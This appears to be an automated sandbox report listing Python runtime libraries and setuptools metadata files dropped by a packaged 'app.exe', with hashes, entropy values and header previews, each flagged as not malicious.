                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\pywintypes38.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):150016
                                                                                                                                                                                                          Entropy (8bit):6.014127736250603
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:uNQ5J8g8dKuii+9BcYrrC0vEM6zcMKo8Nz7onQp:uN4QKuCqYrrC05YcMKDNz7on
                                                                                                                                                                                                          MD5:4BFA43585AD0F9B7AC5858CF2C0B4963
                                                                                                                                                                                                          SHA1:F3E34E2D5748BDC1F49CC665342EE66662919873
                                                                                                                                                                                                          SHA-256:455682C2212474AE895BFB931FFD7D1D15993451BDBE65ACE820C9E747CA3490
                                                                                                                                                                                                          SHA-512:D2346B871F06ADFCB115A97E2B04BE3D49F16BF2E92EAB303E9EABD562E50F95307C8EA7A2F0541579224648FB3938A58D1C31E2248A5C6FCBC5D359D6864CC8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$~..$~..$~..-...(~..v...&~....A.%~..v...0~..v...,~..v...&~..A...%~..0...&~..A.../~..$~...~......)~......%~......%~..Rich$~..........PE..d...R_nb.........." .........F.......(....................................................`..............................................H...........p..d....P..........................T...........................`................................................text............................... ..`.rdata..\...........................@..@.data...P6.......0..................@....pdata.......P.......,..............@..@.rsrc...d....p.......B..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\select.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26696
                                                                                                                                                                                                          Entropy (8bit):6.101296746249305
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                          MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                          SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                          SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                          SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info\INSTALLER

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info\LICENSE

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1023
                                                                                                                                                                                                          Entropy (8bit):5.059832621894572
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                          MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                          SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                          SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                          SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info\METADATA

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):6176
                                                                                                                                                                                                          Entropy (8bit):5.064083268095371
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:FPrK1IGRbneReDO28X992nN5Ps2+GzHFwTE:4pRbneReDO2u92nNhs2PDFF
                                                                                                                                                                                                          MD5:73680194760A890ADE27A46FD4D39082
                                                                                                                                                                                                          SHA1:789D67BB2F46EE10B18612F4E5664B19733FD762
                                                                                                                                                                                                          SHA-256:DD1E1121E3FE31F74445B21F8C56CA37C259C8A2E215FAE8910870F2F102CC66
                                                                                                                                                                                                          SHA-512:02A86F3F9382976847FEE439E14F2881A306D997F5966B093098F36D9CD581D2E2ED615FB867270579BF4A79F5B5524284984E491AD54755A571EF21D5CF76B7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: setuptools.Version: 69.5.1.Summary: Easily download, build, install, upgrade, and uninstall Python packages.Home-page: https://github.com/pypa/setuptools.Author: Python Packaging Authority.Author-email: distutils-sig@python.org.Project-URL: Documentation, https://setuptools.pypa.io/.Project-URL: Changelog, https://setuptools.pypa.io/en/stable/history.html.Keywords: CPAN PyPI distutils eggs package management.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: Topic :: System :: Systems Administration.Classifier: Topic :: Utilities.Requires-Python: >=3.8.License-File: LICENSE.Provides-Extra: certs.Provides-Extra: docs.Requi

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info\RECORD

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):40485
                                                                                                                                                                                                          Entropy (8bit):5.578276068695422
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uaz6ARRM1lhglU1rARJfP9kp6WhESY4cY/ySgrxkEX2B47fN3i59TeO+0gGglC9z:u3szs6BdmpO1h4POzWjfpiAU9q
                                                                                                                                                                                                          MD5:AD043300E38D9FA1124C9FB0B0A2ABCC
                                                                                                                                                                                                          SHA1:54E6F2F91ABC72FFF473E2662D88EFBBA9AC2CAD
                                                                                                                                                                                                          SHA-256:382A70865130DFDD8693ED0DE0E91102718EFC95BA3C3A3DE071AEF37479404E
                                                                                                                                                                                                          SHA-512:15CA5D0FFDA2DC3C08BFB24AC89B8F92368DDA6C692983679CA986DEAE2F7BCAC2D664EEA48032CF7445C67F8EEB17B81DC2BD5A3006528D9172BFE2D1E65A3C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_distutils_hack/__init__.py,sha256=S_WwvI-K985wlulvcWfPT3dvLMCYP1yPh2yngLOmd4E,6002.._distutils_hack/__pycache__/__init__.cpython-38.pyc,,.._distutils_hack/__pycache__/override.cpython-38.pyc,,.._distutils_hack/override.py,sha256=Eu_s-NF6VIZ4Cqd0tbbA5wtWky2IZPNd8et6GLt1mzo,44..distutils-precedence.pth,sha256=JjjOniUA5XKl4N5_rtZmHrVp0baW_LoHsN0iPaX10iQ,151..pkg_resources/__init__.py,sha256=7WnM_gj0UbuMN0knvkudaPeI-IhWbjshIx8JewOiDeM,108932..pkg_resources/__pycache__/__init__.cpython-38.pyc,,..pkg_resources/_vendor/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/__pycache__/__init__.cpython-38.pyc,,..pkg_resources/_vendor/__pycache__/typing_extensions.cpython-38.pyc,,..pkg_resources/_vendor/__pycache__/zipp.cpython-38.pyc,,..pkg_resources/_vendor/backports/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/backports/__pycache__/__init__.cpython-38.pyc,,..pkg_resources/_vendor/backports/__pycache__/tarfile.cpytho

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info\WHEEL

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):92
                                                                                                                                                                                                          Entropy (8bit):4.812622295095324
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                          MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                          SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                          SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                          SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info\entry_points.txt

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2676
                                                                                                                                                                                                          Entropy (8bit):4.541824537388105
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:+MsTHLA5R572Ku3Yy1QchLtoZ+kMySDZZdmRxmgidTFLaelXdcEcijVbxS9djdhN:lELcZDy3g6ySDsm90rZhVhv4hhpTqTog
                                                                                                                                                                                                          MD5:306138C567A0704BCB1625CFE30BBE7F
                                                                                                                                                                                                          SHA1:5A6767AFF68C2CA731320B5820118F40F116F912
                                                                                                                                                                                                          SHA-256:15EF94664CE02D351940E1FDE216CB4F23F81F13359F194CB8467FAD2EB33671
                                                                                                                                                                                                          SHA-512:BADA59F6631C843ADC920ED30AE25D1D4620ADA4CA1EA0830B545252EFCCD4C710459DE2F0172017149199DD23091756BCB0E0C6CD307668D39AACA224AD2F47
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[distutils.commands].alias = setuptools.command.alias:alias.bdist_egg = setuptools.command.bdist_egg:bdist_egg.bdist_rpm = setuptools.command.bdist_rpm:bdist_rpm.build = setuptools.command.build:build.build_clib = setuptools.command.build_clib:build_clib.build_ext = setuptools.command.build_ext:build_ext.build_py = setuptools.command.build_py:build_py.develop = setuptools.command.develop:develop.dist_info = setuptools.command.dist_info:dist_info.easy_install = setuptools.command.easy_install:easy_install.editable_wheel = setuptools.command.editable_wheel:editable_wheel.egg_info = setuptools.command.egg_info:egg_info.install = setuptools.command.install:install.install_egg_info = setuptools.command.install_egg_info:install_egg_info.install_lib = setuptools.command.install_lib:install_lib.install_scripts = setuptools.command.install_scripts:install_scripts.rotate = setuptools.command.rotate:rotate.saveopts = setuptools.command.saveopts:saveopts.sdist = setuptools.command.sdist:sdist.seto

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info\top_level.txt

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                          Entropy (8bit):3.9115956018096876
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:3Wd+Nt8AfQYv:3Wd+Nttv
                                                                                                                                                                                                          MD5:789A691C859DEA4BB010D18728BAD148
                                                                                                                                                                                                          SHA1:AEF2CBCCC6A9A8F43E4E150E7FCF1D7B03F0E249
                                                                                                                                                                                                          SHA-256:77DC8BDFDBFF5BBAA62830D21FAB13E1B1348FF2ECD4CDCFD7AD4E1A076C9B88
                                                                                                                                                                                                          SHA-512:BC2F7CAAD486EB056CB9F68E6C040D448788C3210FF028397CD9AF1277D0051746CAE58EB172F9E73EA731A65B2076C6091C10BCB54D911A7B09767AA6279EF6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_distutils_hack.pkg_resources.setuptools.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\simplejson\_speedups.cp38-win_amd64.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):39936
                                                                                                                                                                                                          Entropy (8bit):5.795641052692915
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:nD/CnUJIcIUJjB8yrMMS5LHQVaz+w0RxgTLG/3sWq1z7LxLQlqqxjDN4w48p0isF:D6nsIcZhwHjzr0RxEABz3qisDJ
                                                                                                                                                                                                          MD5:D39B5BBC09EA9A636652AB0F5255D5F6
                                                                                                                                                                                                          SHA1:D9EBC5CC9FD0C375310ADE82CBEB934191EEF3DB
                                                                                                                                                                                                          SHA-256:B6E1B1C2180F9D2DCB18A7B2A0626E6EC82CB8D5F36A87BFD194967321A27C35
                                                                                                                                                                                                          SHA-512:A43A706BC70660B0AF73CB2C6F272CA1777B5C98EB208586AF8A8752DD69837247FCD6F7E4FEC009E899930A02B9EF23E5A54887AAD848FBE0C3E576E6AEAA73
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.v}r...r...r...{..v....../p...9../p....../~....../z....../q....../q...r........../s....../s.......s....../s...Richr...........PE..d...~J.e.........." ...#.^...@.......c....................................................`.............................................`...p...x...............\...................P...................................@............p..P............................text....].......^.................. ..`.rdata...$...p...&...b..............@..@.data...0...........................@....pdata..\...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\ucrtbase.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1016584
                                                                                                                                                                                                          Entropy (8bit):6.669319438805479
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                                                                          MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                                                                          SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                                                                          SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                                                                          SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\unicodedata.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1096264
                                                                                                                                                                                                          Entropy (8bit):5.343512979675051
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                          MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                          SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                          SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                          SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\win32api.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):140800
                                                                                                                                                                                                          Entropy (8bit):5.889442361235446
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:Y4SNosSqdu8cJi7YjbINlRVyELa8BoXgqsT3E2ygmJQLWJoe:i1SqU8H7gkNlRVusT02y8LI
                                                                                                                                                                                                          MD5:64FEC318EFD64FA98EA427A70C02C808
                                                                                                                                                                                                          SHA1:F6E9BA6A4CE4D300F63004AEE6CA967363CC68A1
                                                                                                                                                                                                          SHA-256:E000F1D7DD22A0A6E87160C633FDD5E35CE8E1E367D612A870F4428AB84AF10A
                                                                                                                                                                                                          SHA-512:6F6DAFF5F9BE46BA1BD312D8BE2BB9A5BE1FDA9F4D1603F528286290B907C5FF6E21939E62E3F101B30BB173519E39D0E00C5157C89093C52AB036D95EE9A758
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...G.Q.G.Q.G.Q.?iQ.G.Q./.P.G.Q./.P.G.Q./.P.G.Qf..P.G.Q.!.P.G.Q./.P.G.Q.!.P.G.Q.G.Q.F.Qf..P.G.Qf..P.G.Qf..P.G.QRich.G.Q........PE..d...v_nb.........." .................&.......................................p............`.........................................0................P..T....0...............`.........T............................;...............0..........@....................text...B........................... ..`.rdata.......0......................@..@.data...X(......."..................@....pdata.......0......................@..@.rsrc...T....P......................@..@.reloc.......`....... ..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\win32evtlog.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):78848
                                                                                                                                                                                                          Entropy (8bit):5.699166049502318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:Kalv4gTA8ZDUcY1WS2B9OVyXt5ee1gL81RAvsG+CpGDVOd0GFz:fvn1VUB1WSc4V4t5ee1gL81RAvsvCpGw
                                                                                                                                                                                                          MD5:03042E20DC63DB027BAE70D81C38045F
                                                                                                                                                                                                          SHA1:FE7A0A0C228AA91A1EFEC4FE87A815C28B594DC1
                                                                                                                                                                                                          SHA-256:154A333CF88820EC33C84D982741EC221B6554D489F2014759F6418606308E24
                                                                                                                                                                                                          SHA-512:08B48FFFB500864D2BDBAEF935607DB501717A301CE1338024DD9EBA722E78EE05E7620B288727DE838BCAFBA0DB3BC087C805F0D246FADC80270BC7FEAE644E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J...+.,.+.,.+.,.S.,.+.,.C.-.+.,.C.-.+.,.C.-.+.,lB.-.+.,.M.-.+.,.C.-.+.,.M.-.+.,.+.,i+.,lB.-.+.,lB.-.+.,lBv,.+.,lB.-.+.,Rich.+.,................PE..d...t_nb.........." .........................................................p............`.........................................p...X............P.......@..X............`..........T...........................@...................H.......@....................text............................... ..`.rdata..Zl.......n..................@..@.data........ ......................@....pdata..X....@......................@..@.rsrc........P.......*..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\win32pdh.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):35840
                                                                                                                                                                                                          Entropy (8bit):5.660208614410584
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:bgeiZ25H7FafTccMBk7nIi5khtwRQ5rIvOua:bgei+7FaLx7nvRQBCOua
                                                                                                                                                                                                          MD5:C58B53DC2DF84A63E58F9423F02D61ED
                                                                                                                                                                                                          SHA1:6EFA7E8D5AEB88A7384724D4CB642DF23CB6D813
                                                                                                                                                                                                          SHA-256:378B9465AC02811EE5BAF1C75B7B24F4BB21F601F9980B5E33EE334476AAB162
                                                                                                                                                                                                          SHA-512:B3DD2173DDD540090FB1B8858481128A0F9B719FC7D9CCEE0C2D96448B61FBB3E13C6D00A28D400FE4BAA9D83A49301646B9EDD45C747BB68B42824005CBC886
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2u..\&..\&..\&..&..\&..]'..\&..]'..\&..Y'..\&..X'..\&.._'..\&M.]'..\&..]'..\&..]&..\&M.U'..\&M.\'..\&M.^'..\&Rich..\&........PE..d...e_nb.........." .....D...D............................................................`............................................P... ...........T...........................`x..T............................x...............`...............................text....B.......D.................. ..`.rdata..p3...`...4...H..............@..@.data...h............|..............@....pdata..............................@..@.rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\win32wnet.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):38400
                                                                                                                                                                                                          Entropy (8bit):5.50397576701013
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:QKQIjQZtexa6Wcu+CgJLcpf3sdtOGY2LW/s2V:QKljQZtey4lcpfcw2LW/s2
                                                                                                                                                                                                          MD5:F43F9B71DB5B32F8E4EDDDDF4C215765
                                                                                                                                                                                                          SHA1:651FE7478CABAD139B8CA84BE0371AB7DE63D299
                                                                                                                                                                                                          SHA-256:66A29A828C6AC7EC4B6A6A78C45766E9EF7F7A2416968EE9D01E38CF8C409B46
                                                                                                                                                                                                          SHA-512:FD39826897413B0BB6E78D94A76A2D14D4FE22EBA99C10C845B6D7A0828D1861E0C9F49234E4A050BD6ED611612C2D78C85D332A9856E7B37445B9A9A10888D8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SPd..1...1...1...I...1..EY...1..EY...1..EY...1..EY...1..X...1...W...1..rW...1...1..{1..X...1..X...1..X...1..Rich.1..........PE..d...o_nb.........." .....B...P............................................................`.............................................H...............T............................q..T...........................Pr...............`...............................text...WA.......B.................. ..`.rdata..~6...`...8...F..............@..@.data................~..............@....pdata..............................@..@.rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\_cffi.cp38-win_amd64.pyd

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):786432
                                                                                                                                                                                                          Entropy (8bit):6.447839862132219
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:y0ihMtx4AohG0KTSNOuQzb7fVqBwTPjRqbL+o6tbUqu7QFSms:9ih24AohGnTSNOu4qBwT0+o6tbUqu7Q4
                                                                                                                                                                                                          MD5:1FF0EAFA81248177E93FA5909BD0AB0D
                                                                                                                                                                                                          SHA1:2C73EE69611ABD7F829123AC2EF378BE18D470D2
                                                                                                                                                                                                          SHA-256:65793EA25DB11AD2A4E3BA3534F6DA80BDF938CE20F3FCD495512C798AE3AE2A
